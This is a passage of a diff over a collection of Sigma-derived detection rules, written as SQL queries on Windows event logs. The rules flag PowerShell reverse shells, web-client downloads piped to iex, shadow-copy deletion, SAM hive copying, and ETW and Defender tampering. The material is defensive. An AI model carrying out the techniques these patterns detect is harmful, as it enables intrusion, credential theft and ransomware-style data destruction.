The adversary may then perform actions as the logged-on user.", - "author": "frack113", + "description": "Checks whether the image specified in a process creation event doesn't refer to an .exe file (caused by process ghosting or other unorthodox methods to start a process)", + "author": "Max Altgelt (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-PSDrive%' ESCAPE '\\' AND ScriptBlockText LIKE '%-psprovider %' ESCAPE '\\' AND ScriptBlockText LIKE '%filesystem%' ESCAPE '\\' AND ScriptBlockText LIKE '%-root %' ESCAPE '\\' AND ScriptBlockText LIKE '%\\\\\\\\\\*' ESCAPE '\\' AND ScriptBlockText LIKE '%$%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NOT ((NewProcessName LIKE '%.exe' ESCAPE '\\' OR NewProcessName LIKE '%.tmp' ESCAPE '\\' OR NewProcessName LIKE '%.scr' ESCAPE '\\')) AND NOT ((NewProcessName IN ('System', 'Registry', 'MemCompression', 'vmmem')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\Installer\\\\MSI%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\DriverStore\\\\FileRepository\\\\%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Config.Msi\\\\%' ESCAPE '\\' AND (NewProcessName LIKE '%.rbf' ESCAPE '\\' OR NewProcessName LIKE '%.rbs' ESCAPE '\\')) OR (ParentProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\Helper\\\\%' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\') AND NewProcessName LIKE '%.com' ESCAPE '\\'))) AND NOT ((NewProcessName IN ('-', '')) OR (NewProcessName = '') OR (ParentProcessName LIKE 
'C:\\\\ProgramData\\\\Avira\\\\%' ESCAPE '\\') OR (NewProcessName LIKE '%NVIDIA\\\\NvBackend\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%.dat' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\WinSCP.com' ESCAPE '\\') OR (NewProcessName LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%.tmp%' ESCAPE '\\' AND NewProcessName LIKE '%CodeSetup%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\program\\\\soffice.bin' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\EMC NetWorker\\\\Management\\\\GST\\\\apache\\\\cgi-bin\\\\update\\_jnlp.cgi' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\EMC NetWorker\\\\Management\\\\GST\\\\apache\\\\cgi-bin\\\\update\\_jnlp.cgi' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\WINPAKPRO\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\WINPAKPRO\\\\%' ESCAPE '\\') AND NewProcessName LIKE '%.ngn' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\MyQ\\\\Server\\\\pcltool.dll' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\MyQ\\\\Server\\\\pcltool.dll' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio%' ESCAPE '\\') AND NewProcessName LIKE '%.com' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Packages\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\LocalState\\\\rootfs\\\\%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\LZMA\\_EXE' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\TBT\\_Dock\\_Firmware\\\\GetDockVer32W.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\tobedeleted\\\\%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Windows\\\\UUS\\\\amd64\\\\MoUsoCoreWorker.exe' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\$Extend\\\\$Deleted\\\\%' 
ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\OfficeC2RClient.exe%' ESCAPE '\\' AND CommandLine LIKE '%/update UPDATEORCHESTRATOR displaylevel=False%' ESCAPE '\\')))" ], - "filename": "posh_ps_susp_new_psdrive.yml" + "filename": "proc_creation_win_susp_non_exe_image.yml" }, { - "title": "Delete Volume Shadow Copies via WMI with PowerShell - PS Script", - "id": "e17121b4-ef2a-4418-8a59-12fb1631fa9e", - "status": "test", - "description": "Deletes Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil", - "author": "frack113", + "title": "New Kernel Driver Via SC.EXE", + "id": "431a1fdb-4799-4f3b-91c3-a683b003fc49", + "status": "experimental", + "description": "Detects creation of a new service (kernel driver) with the type \"kernel\"", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1490" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1543.003" ], "falsepositives": [ - "Unknown" + "Rare legitimate installation of kernel drivers via sc.exe" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-WmiObject%' ESCAPE '\\' AND ScriptBlockText LIKE '%Win32\\_Shadowcopy%' ESCAPE '\\' AND ScriptBlockText LIKE '%.Delete()%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' AND (CommandLine LIKE '%create%' ESCAPE '\\' OR CommandLine LIKE '%config%' ESCAPE '\\') AND CommandLine LIKE '%binPath%' ESCAPE '\\' AND CommandLine LIKE '%type%' ESCAPE '\\' AND CommandLine LIKE '%kernel%' ESCAPE '\\')" ], - "filename": "posh_ps_susp_win32_shadowcopy.yml" + "filename": "proc_creation_win_sc_new_kernel_driver.yml" }, { - 
"title": "Suspicious PowerShell Invocations - Specific", - "id": "ae7fbf8e-f3cb-49fd-8db4-5f3bed522c71", + "title": "Execution Of Non-Existing File", + "id": "71158e3f-df67-472b-930e-7d287acaa3e1", "status": "experimental", - "description": "Detects suspicious PowerShell invocation command parameters", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro", + "description": "Checks whether the image specified in a process creation event is not a full, absolute path (caused by process ghosting or other unorthodox methods to start a process)", + "author": "Max Altgelt (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%-nop%' ESCAPE '\\' AND ScriptBlockText LIKE '% -w %' ESCAPE '\\' AND ScriptBlockText LIKE '%hidden%' ESCAPE '\\' AND ScriptBlockText LIKE '% -c %' ESCAPE '\\' AND ScriptBlockText LIKE '%[Convert]::FromBase64String%' ESCAPE '\\') OR (ScriptBlockText LIKE '% -w %' ESCAPE '\\' AND ScriptBlockText LIKE '%hidden%' ESCAPE '\\' AND ScriptBlockText LIKE '%-noni%' ESCAPE '\\' AND ScriptBlockText LIKE '%-nop%' ESCAPE '\\' AND ScriptBlockText LIKE '% -c %' ESCAPE '\\' AND ScriptBlockText LIKE '%iex%' ESCAPE '\\' AND ScriptBlockText LIKE '%New-Object%' ESCAPE '\\') OR (ScriptBlockText LIKE '% -w %' ESCAPE '\\' AND ScriptBlockText LIKE '%hidden%' ESCAPE '\\' AND ScriptBlockText LIKE '%-ep%' ESCAPE '\\' AND ScriptBlockText LIKE '%bypass%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Enc%' ESCAPE '\\') OR (ScriptBlockText LIKE '%powershell%' ESCAPE '\\' AND ScriptBlockText LIKE '%reg%' ESCAPE '\\' AND ScriptBlockText LIKE '%add%' ESCAPE '\\' AND ScriptBlockText LIKE '%HKCU\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\run%' ESCAPE '\\') OR (ScriptBlockText LIKE '%bypass%' ESCAPE 
'\\' AND ScriptBlockText LIKE '%-noprofile%' ESCAPE '\\' AND ScriptBlockText LIKE '%-windowstyle%' ESCAPE '\\' AND ScriptBlockText LIKE '%hidden%' ESCAPE '\\' AND ScriptBlockText LIKE '%new-object%' ESCAPE '\\' AND ScriptBlockText LIKE '%system.net.webclient%' ESCAPE '\\' AND ScriptBlockText LIKE '%.download%' ESCAPE '\\') OR (ScriptBlockText LIKE '%iex%' ESCAPE '\\' AND ScriptBlockText LIKE '%New-Object%' ESCAPE '\\' AND ScriptBlockText LIKE '%Net.WebClient%' ESCAPE '\\' AND ScriptBlockText LIKE '%.Download%' ESCAPE '\\')) AND NOT (((ScriptBlockText LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://community.chocolatey.org/install.ps1%' ESCAPE '\\' OR ScriptBlockText LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://chocolatey.org/install.ps1'')%' ESCAPE '\\' OR ScriptBlockText LIKE '%Write-ChocolateyWarning%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NOT (NewProcessName LIKE '%\\\\%' ESCAPE '\\') AND NOT ((NewProcessName = '') OR (NewProcessName IN ('-', '')) OR (NewProcessName IN ('System', 'Registry', 'MemCompression', 'vmmem') OR CommandLine IN ('Registry', 'MemCompression', 'vmmem'))))" ], - "filename": "posh_ps_susp_invocation_specific.yml" + "filename": "proc_creation_win_susp_image_missing.yml" }, { - "title": "Automated Collection Bookmarks Using Get-ChildItem PowerShell", - "id": "e0565f5d-d420-4e02-8a68-ac00d864f9cf", - "status": "test", - "description": "Adversaries may enumerate browser bookmarks to learn more about compromised hosts.\nBrowser bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) 
as well as details about\ninternal network resources such as servers, tools/dashboards, or other related infrastructure.\n", - "author": "frack113", + "title": "Remote Access Tool - ScreenConnect Backstage Mode Anomaly", + "id": "7b582f1a-b318-4c6a-bf4e-66fe49bf55a5", + "status": "experimental", + "description": "Detects suspicious sub processes started by the ScreenConnect client service, which indicates the use of the so-called Backstage mode", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1217" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Case in which administrators are allowed to use ScreenConnect's Backstage mode" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Get-ChildItem%' ESCAPE '\\' AND ScriptBlockText LIKE '% -Recurse %' ESCAPE '\\' AND ScriptBlockText LIKE '% -Path %' ESCAPE '\\' AND ScriptBlockText LIKE '% -Filter Bookmarks%' ESCAPE '\\' AND ScriptBlockText LIKE '% -ErrorAction SilentlyContinue%' ESCAPE '\\' AND ScriptBlockText LIKE '% -Force%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%ScreenConnect.ClientService.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\'))" ], - "filename": "posh_ps_get_childitem_bookmarks.yml" + "filename": "proc_creation_win_remote_access_tools_screenconnect_anomaly.yml" }, { - "title": "Powershell Store File In Alternate Data Stream", - "id": "a699b30e-d010-46c8-bbd1-ee2e26765fe9", + "title": "Code Execution via Pcwutl.dll", + "id": "9386d78a-7207-4048-9c9f-a93a7c2d1c05", "status": "test", - "description": "Storing files in Alternate Data Stream (ADS) similar to Astaroth malware.", 
- "author": "frack113", + "description": "Detects launch of executable by calling the LaunchApplication function from pcwutl.dll library.", + "author": "Julia Fomina, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1564.004" + "attack.t1218.011" ], "falsepositives": [ - "Unknown" + "Use of Program Compatibility Troubleshooter Helper" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Start-Process%' ESCAPE '\\' AND ScriptBlockText LIKE '%-FilePath \"$env:comspec\" %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ArgumentList %' ESCAPE '\\' AND ScriptBlockText LIKE '%>%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%pcwutl%' ESCAPE '\\' AND CommandLine LIKE '%LaunchApplication%' ESCAPE '\\'))" ], - "filename": "posh_ps_store_file_in_alternate_data_stream.yml" + "filename": "proc_creation_win_lolbin_pcwutl.yml" }, { - "title": "Recon Information for Export with PowerShell", - "id": "a9723fcc-881c-424c-8709-fd61442ab3c3", - "status": "test", - "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data", - "author": "frack113", + "title": "Suspicious DLL Loaded via CertOC.EXE", + "id": "84232095-ecca-4015-b0d7-7726507ee793", + "status": "experimental", + "description": "Detects when a user installs certificates by using CertOC.exe to load the target DLL file.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1119" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN 
('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Get-Service %' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ChildItem %' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Process %' ESCAPE '\\') AND ScriptBlockText LIKE '%> $env:TEMP\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\certoc.exe' ESCAPE '\\' OR OriginalFileName = 'CertOC.exe') AND (CommandLine LIKE '% -LoadDLL %' ESCAPE '\\' OR CommandLine LIKE '% /LoadDLL %' ESCAPE '\\') AND (CommandLine LIKE '%\\\\Appdata\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" ], - "filename": "posh_ps_susp_recon_export.yml" + "filename": "proc_creation_win_certoc_load_dll_susp_locations.yml" }, { - "title": "NTFS Alternate Data Stream", - "id": "8c521530-5169-495d-a199-0a3a881ad24e", + "title": "PowerShell SAM Copy", + "id": "1af57a4b-460a-4738-9034-db68b880c665", "status": "test", - "description": "Detects writing data into NTFS alternate data streams from powershell. 
Needs Script Block Logging.", - "author": "Sami Ruohonen", + "description": "Detects suspicious PowerShell scripts accessing SAM hives", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1564.004", - "attack.execution", - "attack.t1059.001" + "attack.credential_access", + "attack.t1003.002" ], "falsepositives": [ - "Unknown" + "Some rare backup scenarios", + "PowerShell scripts fixing HiveNightmare / SeriousSAM ACLs" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%set-content%' ESCAPE '\\' OR ScriptBlockText LIKE '%add-content%' ESCAPE '\\') AND ScriptBlockText LIKE '%-stream%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\HarddiskVolumeShadowCopy%' ESCAPE '\\' AND CommandLine LIKE '%System32\\\\config\\\\sam%' ESCAPE '\\' AND (CommandLine LIKE '%Copy-Item%' ESCAPE '\\' OR CommandLine LIKE '%cp $\\_.%' ESCAPE '\\' OR CommandLine LIKE '%cpi $\\_.%' ESCAPE '\\' OR CommandLine LIKE '%copy $\\_.%' ESCAPE '\\' OR CommandLine LIKE '%.File]::Copy(%' ESCAPE '\\'))" ], - "filename": "posh_ps_ntfs_ads_access.yml" + "filename": "proc_creation_win_powershell_sam_access.yml" }, { - "title": "PowerShell Deleted Mounted Share", - "id": "66a4d409-451b-4151-94f4-a55d559c49b0", + "title": "Suspicious SYSVOL Domain Group Policy Access", + "id": "05f3c945-dcc8-4393-9f3d-af65077a8f86", "status": "test", - "description": "Detects when when a mounted share is removed. 
Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation", - "author": "oscd.community, @redcanary, Zach Stanford @svch0st", + "description": "Detects Access to Domain Group Policies stored in SYSVOL", + "author": "Markus Neis, Jonhnathan Ribeiro, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1070.005" + "attack.credential_access", + "attack.t1552.006" ], "falsepositives": [ - "Administrators or Power users may remove their shares via cmd line" + "Administrative activity" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Remove-SmbShare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-FileShare%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\SYSVOL\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\policies\\\\%' ESCAPE '\\')" ], - "filename": "posh_ps_susp_mounted_share_deletion.yml" + "filename": "proc_creation_win_susp_sysvol_access.yml" }, { - "title": "Disable of ETW Trace - Powershell", - "id": "115fdba9-f017-42e6-84cf-d5573bf2ddf8", + "title": "DriverQuery.EXE Execution", + "id": "a20def93-0709-4eae-9bd2-31206e21e6b2", "status": "experimental", - "description": "Detects usage of powershell cmdlets to disable or remove ETW trace sessions", + "description": "Detect usage of the \"driverquery\" utility. 
Which can be used to perform reconnaissance on installed drivers", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1070", - "attack.t1562.006", - "car.2016-04-002" + "attack.discovery" ], "falsepositives": [ - "Unknown" + "Legitimate use by third party tools in order to investigate installed drivers" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Remove-EtwTraceProvider %' ESCAPE '\\' OR (ScriptBlockText LIKE '%Set-EtwTraceProvider %' ESCAPE '\\' AND ScriptBlockText LIKE '%0x11%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%driverquery.exe' ESCAPE '\\' OR OriginalFileName = 'drvqry.exe'))" ], - "filename": "posh_ps_etw_trace_evasion.yml" + "filename": "proc_creation_win_driverquery_usage.yml" }, { - "title": "PowerShell Called from an Executable Version Mismatch", - "id": "c70e019b-1479-4b65-b0cc-cd0c6093a599", - "status": "test", - "description": "Detects PowerShell called from an executable by the version mismatch method", - "author": "Sean Metcalf (source), Florian Roth (Nextron Systems)", + "title": "Potential Powershell ReverseShell Connection", + "id": "edc2f8ae-2412-4dfd-b9d5-0c57727e70be", + "status": "stable", + "description": "Detects usage of the \"TcpClient\" class. Which can be abused to establish remote connections and reverse-shells. 
As seen used by the Nishang \"Invoke-PowerShellTcpOneLine\" reverse shell and other.", + "author": "FPT.EagleEye, wagga, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", "attack.execution", "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "In rare administrative cases, this function might be used to check network connectivity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND (EngineVersion LIKE '2.%' ESCAPE '\\' OR EngineVersion LIKE '4.%' ESCAPE '\\' OR EngineVersion LIKE '5.%' ESCAPE '\\') AND HostVersion LIKE '3.%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll') OR (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\')) AND (CommandLine LIKE '% Net.Sockets.TCPClient%' ESCAPE '\\' AND CommandLine LIKE '%.GetStream(%' ESCAPE '\\' AND CommandLine LIKE '%.Write(%' ESCAPE '\\'))" ], - "filename": "posh_pc_exe_calling_ps.yml" + "filename": "proc_creation_win_powershell_reverse_shell_connection.yml" }, { - "title": "Delete Volume Shadow Copies Via WMI With PowerShell", - "id": "87df9ee1-5416-453a-8a08-e8d4a51e9ce1", + "title": "Fsutil Suspicious Invocation", + "id": "add64136-62e5-48ea-807e-88638d02df1e", "status": "stable", - "description": "Shadow Copies deletion using operating systems utilities via PowerShell", - "author": "frack113", + "description": "Detects suspicious parameters of fsutil (deleting USN journal, configuring it with small size, etc).\nMight be used by ransomwares during the attack (seen by NotPetya and others).\n", + "author": "Ecco, E.M. 
Anhaus, oscd.community", "tags": [ - "attack.impact", - "attack.t1490" + "attack.defense_evasion", + "attack.t1070" ], "falsepositives": [ - "Legitimate Administrator deletes Shadow Copies using operating systems utilities for legitimate reason" + "Admin activity", + "Scripts and administrative tools used in the monitored environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND HostApplication LIKE '%Get-WmiObject%' ESCAPE '\\' AND HostApplication LIKE '% Win32\\_Shadowcopy%' ESCAPE '\\' AND (HostApplication LIKE '%Delete()%' ESCAPE '\\' OR HostApplication LIKE '%Remove-WmiObject%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\fsutil.exe' ESCAPE '\\' OR OriginalFileName = 'fsutil.exe') AND (CommandLine LIKE '%deletejournal%' ESCAPE '\\' OR CommandLine LIKE '%createjournal%' ESCAPE '\\'))" ], - "filename": "posh_pc_delete_volume_shadow_copies.yml" + "filename": "proc_creation_win_fsutil_usage.yml" }, { - "title": "Use Get-NetTCPConnection", - "id": "b366adb4-d63d-422d-8a2c-186463b5ded0", + "title": "Blue Mockingbird", + "id": "c3198a27-23a0-4c2c-af19-e5328d49680e", "status": "test", - "description": "Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.", - "author": "frack113", + "description": "Attempts to detect system changes made by Blue Mockingbird", + "author": "Trent Liffick (@tliffick)", "tags": [ - "attack.discovery", - "attack.t1049" + "attack.execution", + "attack.t1112", + "attack.t1047" ], "falsepositives": [ "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND HostApplication LIKE '%Get-NetTCPConnection%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 
'Security') AND ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%sc config%' ESCAPE '\\' AND CommandLine LIKE '%wercplsupporte.dll%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' AND CommandLine LIKE '%COR\\_PROFILER' ESCAPE '\\')))" ], - "filename": "posh_pc_susp_get_nettcpconnection.yml" + "filename": "proc_creation_win_malware_blue_mockingbird.yml" }, { - "title": "Suspicious XOR Encoded PowerShell Command Line - PowerShell", - "id": "812837bb-b17f-45e9-8bd0-0ec35d2e3bd6", + "title": "Dllhost.EXE Execution Anomaly", + "id": "e7888eb1-13b0-4616-bd99-4bc0c2b054b9", "status": "experimental", - "description": "Detects suspicious powershell process which includes bxor command, alternative obfuscation method to b64 encoded commands.", - "author": "Teymur Kheirkhabarov, Harish Segar (rule)", + "description": "Detects a \"dllhost\" process spawning with no commandline arguments which is very rare to happen and could indicate process injection activity or malware mimicking similar system processes.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.defense_evasion", + "attack.t1055" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND HostName = 'ConsoleHost' AND (HostApplication LIKE '%bxor%' ESCAPE '\\' OR HostApplication LIKE '%join%' ESCAPE '\\' OR HostApplication LIKE '%char%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%dllhost.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\')" ], - "filename": "posh_pc_xor_commandline.yml" + "filename": "proc_creation_win_dllhost_no_cli_execution.yml" }, { - "title": "Remote PowerShell Session (PS Classic)", - "id": "60167e5c-84b2-4c95-a7ac-86281f27c445", + "title": "Suspicious Scan Loop Network", + "id": 
"f8ad2e2c-40b6-4117-84d7-20b89896ab23", "status": "test", - "description": "Detects remote PowerShell sessions", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "description": "Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system", + "author": "frack113", "tags": [ "attack.execution", - "attack.t1059.001", - "attack.lateral_movement", - "attack.t1021.006" + "attack.t1059", + "attack.discovery", + "attack.t1018" ], "falsepositives": [ - "Legitimate use remote PowerShell sessions" + "Legitimate script" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND HostName = 'ServerRemoteHost' AND HostApplication LIKE '%wsmprovhost.exe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%for %' ESCAPE '\\' OR CommandLine LIKE '%foreach %' ESCAPE '\\') AND (CommandLine LIKE '%nslookup%' ESCAPE '\\' OR CommandLine LIKE '%ping%' ESCAPE '\\'))" ], - "filename": "posh_pc_remote_powershell_session.yml" + "filename": "proc_creation_win_susp_network_scan_loop.yml" }, { - "title": "Suspicious PowerShell Download", - "id": "3236fcd0-b7e3-4433-b4f8-86ad61a9af2d", - "status": "experimental", - "description": "Detects suspicious PowerShell download command", - "author": "Florian Roth (Nextron Systems)", + "title": "Remote PowerShell Session Host Process (WinRM)", + "id": "734f8d9b-42b8-41b2-bcf5-abaf49d5a3c8", + "status": "test", + "description": "Detects remote PowerShell sections by monitoring for wsmprovhost (WinRM host process) as a parent or child process (sign of an active PowerShell remote session).", + "author": "Roberto Rodriguez @Cyb3rWard0g", "tags": [ "attack.execution", - "attack.t1059.001" + "attack.t1059.001", + "attack.t1021.006" ], "falsepositives": [ - "PowerShell scripts that download content from the 
Internet" + "Legitimate usage of remote Powershell, e.g. for monitoring purposes." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND HostApplication LIKE '%Net.WebClient%' ESCAPE '\\' AND (HostApplication LIKE '%.DownloadFile(%' ESCAPE '\\' OR HostApplication LIKE '%.DownloadString(%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\'))" ], - "filename": "posh_pc_susp_download.yml" + "filename": "proc_creation_win_winrm_remote_powershell_session_process.yml" }, { - "title": "Tamper Windows Defender - PSClassic", - "id": "ec19ebab-72dc-40e1-9728-4c0b805d722c", + "title": "HackTool - SharPersist Execution", + "id": "26488ad0-f9fd-4536-876f-52fea846a2e4", "status": "experimental", - "description": "Attempting to disable scheduled scanning and other parts of windows defender atp. 
